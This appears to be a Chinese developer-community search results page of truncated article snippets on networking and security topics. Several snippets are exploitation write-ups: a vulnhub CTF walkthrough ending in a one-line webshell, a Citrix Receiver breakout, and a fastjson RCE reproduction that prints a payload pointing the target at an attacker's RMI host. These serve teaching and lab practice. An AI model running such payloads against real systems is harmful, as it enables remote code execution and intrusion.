首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

vulnhub-TED靶场过程记录

靶场地址:https://download.vulnhub.com/ted/Ted.7z 靶场设置 使用VM打开 ? ? 扫描靶场网段,得到ip地址 ? 访问网址是个登陆框 ?...随便输入个密码后,发现密码或者密码hash错误,尝试多样密码对比图如下 ? ? 看来密码是admin没错了,然后应该是hash加密后访问。...这里耗尽了大量时间,得出来了结果(还是朋友做出来,难受) 这里使用是sha256加密,然后加密字符串,字符转换大写 ? ? 在在线网站进行大小写转换 ? 一发入魂 ? 获得下一步提示 ?...正常读取会出现退出登陆情况,使用php伪协议读取到了文件 ? 源码如下 ? 同样方式读取home ?...Home文件中有这么一句话 _SESSION['user_pref'] = _COOKIE['user_pref']; 任意文件读取到sessions目录 第一种 写入一句话木马 ? 链接蚁剑 ?

78040
您找到你想要的搜索结果了吗?
是的
没有找到

利用Citrix Receiver浏览器进行渗透

/Google 浏览器SSRF内网端口扫描 2.8 修复建议 Citrix Receiver 简介: Citrix Receiver 是一种轻便通用软件客户端,并带有类似浏览器扩展“插件”架构。...用户登陆平台点击对应连接方式,即可在用户端打开服务器端上面的应用程序进行本地操作,应用系统连接方式主要是各类主流浏览器,如 IE、火狐、Google chrome 等,参考下图: ?...2.5.2 IE浏览器getPowerShell 由于服务器 IE 浏览器禁用了地址栏,禁用了鼠标右键以及菜单、设置等功能,因此就在本地 IE 浏览器 进行测试,在地址栏中直接访问会提示下载,如图:...浏览器 SSRF 内网端口扫描 使用 Firefox 或 Google 浏览器访问 telnet:///,第一个应用程序就是默认 telnet 终端,如图: ?...打开链接即可进入到 telnet 终端,由于服务器做了限制,这里使用本地测试,如图: ? ? 2.8 修复建议: 1) 设置权限控制,对用户访问资产进行白名单限制,白名单资产拒绝访问!

1.8K10

fastjson漏洞原理与复现

fastjson在解析过程中会使用autotype来实例化某一个具体类,autoType作用就是来定位需要反序列化对象位置,然后通过@type指定内容来选择反序列化使用链为哪一条,那么我们通过此特性通过指定...datasourcename参数为我们恶意class类,从而导致命令执行 fastjson 1.2.24-rce漏洞复现 环境地址 https://github.com/vulhub/vulhub 启动环境...ip/#RCE" 9999 ​ burp抓包访问写上如下payload POST / HTTP/1.1 Host: 110.41.41.14:8090 User-Agent: Mozilla/5.0 (..."dataSourceName":"rmi://192.168.13.106:9999/rce", "autoCommit":true } ​ } 如下图成功访问本地...rce.class文件 本地已执行命令 fastjson 1.2.47-rce漏洞复现 描述 该漏洞为1.2.24白名单限制,绕过白名单限制进行命令执行(与1.2.24原理相同) 环境地址 https

22620

利用CitrixReceiver浏览器进行渗透

Citrix Receiver简介 Citrix Receiver是一种轻便通用软件客户端,并带有类似浏览器扩展“插件”架构。...用户登陆平台点击对应连接方式,即可在用户端打开服务器端上面的应用程序进行本地操作,应用系统连接方式主要是各类主流浏览器,如IE、火狐、Google chrome等,参考下图: 主机系统连接方式主要是远程类终端进行登录...0x01 浏览器利用 2.1 越权/SSRF 由于地址栏是可控,且浏览器功能也是完整,所以可以通过修改授权应用系统地址去访问他人系统,该漏洞可以认为是越权漏洞,由于这些操作都是通过服务器请求完成...https://forum.90sec.com/t/topic/310 2.7 Firefox/Google浏览器SSRF内网端口扫描 使用Firefox或Google浏览器访问telnet:///,第一个应用程序就是默认...telnet终端,如图: 打开链接即可进入到telnet终端,由于服务器做了限制,这里使用本地测试,如图: 0x02 修复建议 设置权限控制,对用户访问资产进行白名单限制,白名单资产拒绝访问

37720

TLS指纹分析研究(下)

2.2 M工具 M工具是洋葱网络基于域前置插拔传输,通过与洋葱浏览器捆绑Firefox ESR进行隧道,然而ESR版本指纹相对不常见。...,而M工具使用一个接近淘汰Firefox版本,所以可以以较小附带伤害阻塞M工具。...2.5 L工具 L工具主要依靠随机Lampshade插拔传输避免被识别,截止2018年2月,部分L工具仍然使用TLS作为传输方式,使用Golang TLS变体发送Session Ticket扩展向服务器传递信息...例如,最受欢迎单外部IP地址(对应Google),从发送给它1494个客户端指纹中发送了199个唯一服务器指纹,仅查看对最流行Client Hello消息响应,就会发现有750个不同Server...支持非标准特性共性表明,检测人员可能很难完全了解或使用白名单覆盖所有常用指纹。

1.6K20

可能是目前全网最好全平台去广告指南,让你从此告别广告烦恼!( 强烈建议收藏 )

Javascript Switcher 和 Firefox NoScript Security Suite —— 但这是剂猛药,可能会影响网页正常使用,请酌情使用。...Hosts 是每个设备上都有的一个系统文件,工作原理也很好理解:它将常见网址域名与其 IP 相关联,当我们输入一个域名后,系统会先在 Hosts 文件中寻找对应 IP 地址,若是找到了会立即打开。...比如我们可以在 Hosts 文件里添上这么一行 127.0.0.1 adsites.com 这样我们就把 adsites.com 这个网站重定向到了本地 IP 地址,也就达到了去广告效果。...uBlock Origin 等扩展「订阅规则」这一特性来自于最开始 Adblock(参见前文),有自己一套独有的语法,而 Hosts 是由 IP 地址和网址两部分组成。...承接上文 Hosts 查询,当我们输入一个域名时会先在本地 Hosts 中查询是否有域名对应 IP,若是没有则会向远端 DNS 服务器查询(因此 DNS 也被形象地称为「互联网电话簿」)。

5.3K20

Charles 抓包工具

试用期过后,未付费用户仍然可以继续使用,但是每次使用时间不能超过 30 分钟,并且启动时将会有 10 秒种延时。因此,该付费方案对广大用户还是相当友好,即使你长期付费,也能使用完整软件功能。...当请求通过 Charles 时,您 DNS 映射将优先。 Charles 包含配置域名到 IP 地址映射列表。...当针对列出域名发出请求时,Spoof DNS 插件会发现欺骗 IP 将请求重定向到该地址。主机HTTP标头保持不变,因此就像您 DNS 服务器返回欺骗性 IP一样。...如果没有为您站点设置 DNS,那么您通常无法测试它,因为您不能只输入 IP 地址,因为服务器无法获取名称,因此无法将请求与网站。使用 DNS 欺骗工具来克服此问题。...手机端配置:通过 Charles 主菜单 Help | Local IP Address 或者通过命令行工具输入 ipconfig 查看本机 IP 地址

2.2K30

一人有网全村不慌!两种方法突破局域网封锁。

三层交换起VLAN划分和VLAN间路由功能,因为三层交换路由效率远远超过路由器路由效率。二层交换用于物理分布上VLAN扩展和网络扩展,而傻瓜交换机则用于实际环境中单个空间内端口扩展。...为了实行外网管控,行为管理一般实施为白名单策略,即IP+MAC地址绑定,对于这种情况通常突破思路为强制设置IP地址并修改为白名单用户MAC地址,这样缺点也很明显,对方即会提示IP冲突,同时也会由于MAC...在客户端中,我们只需要将网关设置为白名单PCIP即可,此时白名单PC处于路由模式,等同于一台路由器。...客户端设置 简单网页代理设置,Internet选项-连接-局域网(LAN)设置-代理服务器 设置为白名单PC地址和代理端口,同时勾选 跳过本地地址代理服务器,就可以进行网页浏览了。...此时实现效果是,IE与飞秋走代理直接连接,192.168.136.0网段内通信走代理直接连接,其他应用全部走代理,完美实现我们目的。

1.3K20

接口测试工具Hoppscotch

Web 演示地址: https://hoppscotch.io/cn GitHub 地址: https://github.com/hoppscotch/hoppscotch 2、安装部署 因采用本地安装方式会有一些或多或少错误...3、快速请求 打开浏览器,地址输入 http://服务器IP:3000/ 即可。 操作界面跟 Postman 很像。 注意,如果提示:无法发送请求,无法到达 API 端点。请检查网络连接并重试。...解决方法:需要安装浏览器插件 GitHub 地址: https://github.com/hoppscotch/hoppscotch-extension 点击设置,扩展里选择要安装浏览器插件(Chrome...例如 Firefox,下载安装即可。 插件安装完成后,点击插件图标,点击 Add,添加 origin 地址(部署服务器地址),以支持跨站请求。 添加 origin 地址完成。...最后,点击设置,打开使用浏览器扩展发送请求。 再次访问接口地址,例如百度首页,请求成功。 4、生成代码 在请求地址区,点击显示代码。

1.8K20

Python + Selenium + Firefox 使用代理 auth 用户名密码授权

,专门研发示例, 支持 http、https无密码、白名单ip、密码授权三种类型 示例中,用插件 xpi 请到米扑代理官网,或米扑官方 github 下载 本文,直接给出完整代码,都经过严格验证通过...,具体请见注释 Python + Firefox + 插件(closeproxy.xpi) 其中,closeproxy.xpi文件,需要Google、Bing搜下都能搜到下载地址 完整测试代码如下:...设置密码时,需要使用到两个插件: # 插件1: modify_headers-0.7.1.1-fx.xpi # 下载地址:https://github.com/mimvp/mimvp-proxy-demo...+ proxy + whiteip (无密码,或白名单ip授权) ## 米扑代理:https://proxy.mimvp.com def spider_url_firefox_by_whiteip(url...spider_url_firefox(url) # 代理无密码,或设置白名单ip,成功 spider_url_firefox_by_whiteip(url)

1.7K30

iptables网络安全服务详细使用

,即到达本地防火墙服务器数据包 FORWARD for packets being routed through the box 路由穿过数据包,即经过本地防火墙服务器数据包 OUTPUT for...PREROUTING 在数据包到达防火墙时,进行路甶判断之前执行规则,作用是改变数据包目的地址、目的端□等就是收信时,根据规则重写收件人地址。...写好发件人地址,要让家人回信时能够有地址回。 例如。默认笔记本和虚拟机都是局域网地址,在出网时候被路甶器将源地址改为了公网地址。 生产应用:局域网共享上网。.../24 -j DROP 可以指定 -t filter 因为默认就是filter表 -i:流量进入接口(从eth0进入) -s:源地址地址不是10.0.0.150单个IP禁止连接: iptables...: iptables -A INPUT -p tcp -m multiport --dport 22,80 -j DROP -m --- 表示增加扩展匹配功能 multiport 实现连续多端口扩展匹配

1.3K100

iptables网络安全服务详细使用

,即到达本地防火墙服务器数据包 FORWARD for packets being routed through the box 路由穿过数据包,即经过本地防火墙服务器数据包 OUTPUT for...PREROUTING 在数据包到达防火墙时,进行路甶判断之前执行规则,作用是改变数据包目的地址、目的端□等就是收信时,根据规则重写收件人地址。...写好发件人地址,要让家人回信时能够有地址回。 例如。默认笔记本和虚拟机都是局域网地址,在出网时候被路甶器将源地址改为了公网地址。 生产应用:局域网共享上网。.../24 -j DROP 可以指定 -t filter 因为默认就是filter表 -i:流量进入接口(从eth0进入) -s:源地址地址不是10.0.0.150单个IP禁止连接: iptables...: iptables -A INPUT -p tcp -m multiport --dport 22,80 -j DROP -m --- 表示增加扩展匹配功能 multiport 实现连续多端口扩展匹配

81690

iptables网络安全服务详细使用

,即到达本地防火墙服务器数据包 FORWARD for packets being routed through the box 路由穿过数据包,即经过本地防火墙服务器数据包 OUTPUT for...PREROUTING 在数据包到达防火墙时,进行路甶判断之前执行规则,作用是改变数据包目的地址、目的端□等就是收信时,根据规则重写收件人地址。...写好发件人地址,要让家人回信时能够有地址回。 例如。默认笔记本和虚拟机都是局域网地址,在出网时候被路甶器将源地址改为了公网地址。 生产应用:局域网共享上网。.../24 -j DROP 可以指定 -t filter 因为默认就是filter表 -i:流量进入接口(从eth0进入) -s:源地址地址不是10.0.0.150单个IP禁止连接: iptables...: iptables -A INPUT -p tcp -m multiport --dport 22,80 -j DROP -m --- 表示增加扩展匹配功能 multiport 实现连续多端口扩展匹配

77250

TCP IP模型:什么是TCP IP堆栈?协议层,优点

TCP提供可靠性,并确保按顺序到达数据应重新整理。 TCP允许您实现流控制,因此发送者永远不会用数据强过接收者。 TCP / IP四层 ?...IP: 互联网协议地址(也称为IP地址)是数字标签。它分配给连接到使用IP进行通信计算机网络每个设备。它路由功能允许互联互通,并实质上建立了Internet。...每当您使用网络浏览器(例如Google Chrome或Firefox)时,都在使用网络客户端。它有助于HTTP传输您从远程服务器请求网页。 SMTP: SMTP代表简单邮件传输协议。...但是,用户更喜欢使用该DNS名称而不是地址。 TELNET: TELNET代表终端网络。它在本地计算机和远程计算机之间建立连接。它以可以在远程系统上模拟本地系统方式建立了连接。...它使组织之间互联互通成为可能。 TCP / IP模型具有高度扩展客户端-服务器体系结构。 它可以独立操作。 支持多种路由协议。 它可用于在两台计算机之间建立连接。

2.8K10

使用NGINX和NGINX Plus速率限速

它将该插槽标记为“已占用”,并且不会将其释放以供另一个请求使用,直到适当时间过去(在我们示例中,在100毫秒之后)。 假设如前所述,20槽队列是空,21个请求从给定IP地址同时到达。...geo块为白名单IP地址分配0到$ limit,对所有其他IP地址分配1。...IP地址 把两个对齐,$ limit_key设置为白名单IP地址空字符串,否则设置为客户端IP地址。...扩展前面的例子,我们可以对白名单IP地址应用速率限制: ? 白名单IP地址没有匹配到第一个速率限制(req_zone),但匹配第二个(req_zone_wl),因此每秒限制为15个请求。...我们还涵盖了对白名单和黑名单客户端IP地址应用不同限制高级配置,并解释了如何记录拒绝和延迟请求。

1.2K90

腾讯云中间件产品月报(第3期)

2.消息队列CKafka:访问白名单配置可使用IP网段;支持在Partition维度设置offset;监控支持按带宽百分比进行监控;支持控制台查询消息。...扫码了解更多相关信息 消息队列CKafka 产品介绍:分布式、高吞吐量、高扩展消息服务,具备数据压缩、同时支持离线和实时数据处理等优点。 新功能特性 1. 访问白名单支持使用IP网段。...相比原生Kafka配置访问白名单——手动填写每个IP地址方式,配置IP网段更方便快捷。 2. 支持在Partition维度设置offset。按照partition去设置offset更为合理. 3....用户可以在本地调试分布式事务,省去打包、部署到云主机过程,节省调试时间。 ?...分片任务断点续跑:支持针对已经完成分片任务批次提供断点续跑能力,断点续跑只执行当前批次状态为失败分片实例,并将该分片实例上次执行失败后传递扩展参数进行下发,通过任务执行上下文获取下发扩展参数可以继续未完成业务逻辑

34720

聊一聊万恶锁首

,来确认要展示给用户第一个网页是什么(并不是第一个访问ip地址,后面会继续提到).....) 5:修改目标IP,将IP地址指向127.0.0.1 和修改目标端口, 将端口指向本地监听端口 当上面的问题都考虑之后我们在ConnectFilter里面就能这样做了....3:白名单进程判断 这里贴代码了,适当合理检查可以很大程序增加过滤效率和误判率 4:白名单IP过滤(重入判断) 这里白名单过滤并不是为了放过某些Addr,而是为了解决重入问题,例如当我们打开百度或其他搜索引擎之后...ip和端口之后,给浏览器发送加密后302数据. 1:生成本地www.234x.com证书 具体过程自行百度openssl,不再赘述 2:ssl初始化,导入证书,与socket绑定等 ?...TDI过滤利与弊: 弊: 笔者在搜集了市面几种锁首之后通过TDI过滤网络请求,基本都干掉了多款使用以上12345种方法锁首程序.但并不是完美的.还存在一个致命问题就是Chrome和FireFox加入了证书检测

60170
领券